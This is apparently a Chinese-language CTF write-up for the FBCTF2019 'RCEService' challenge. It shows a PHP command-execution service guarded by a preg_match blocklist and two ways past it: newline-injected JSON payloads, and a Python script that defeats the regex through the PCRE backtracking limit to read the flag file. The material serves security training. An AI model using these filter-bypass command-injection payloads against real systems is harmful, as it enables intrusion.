页面提示输入json格式的命令
{"cmd": "ls"}
输入ls命令查看当前目录文件,当前目录仅有index.php文件
读取index.php文件,发现被检测到
{"cmd": "cat ./index.php"}
经过测试发现很多命令和符号都被过滤,自己是没有做出来,在看别人的wp时发现他们不知道从哪里找到的源码
源码
<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];
if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}
?>
源码显示当前环境为/home/rceservice/jail,并且preg_match过滤了很多东西
解法一
因为这里用的是preg_match进行匹配,preg_match匹配有一个问题就是preg_match只能匹配第一行的数据,所以可以使用换行符绕过
因为putenv('PATH=/home/rceservice/jail');修改了环境变量,所以只能使用绝对路径使用cat命令,cat命令在/bin文件夹下
Linux命令的位置:
/bin,/usr/bin,默认都是全体用户使用;/sbin,/usr/sbin默认root用户使用
payload
{%0A"cmd":"ls /home/rceservice"%0A}
在/home/rceservice下发现flag文件
{%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}
读取flag文件,得到flag
flag{879b70ce-39e2-4dd6-9852-2cd81be36051}
解法二
来自PHITHON的PHP利用PCRE回溯次数限制绕过某些安全限制,通过发送超长字符串的方式,使正则执行失败,最后绕过目标对PHP语言的限制。
PCRE回溯的方法解题,需要用POST发送请求,因为GET会因为头太大报错。
上面使用ls找到了flag的位置,然后使用以下脚本读取flag文件
import requests
payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'
res = requests.post("http://16db7a43-30ad-49d7-b3f3-dce880bd5aec.node4.buuoj.cn:81/", data={"cmd":payload})
print(res.text)
标签:bin,WEB,cmd,RCEService,rceservice,flag,FBCTF2019,home,match
From: https://www.cnblogs.com/scarecr0w7/p/17377295.html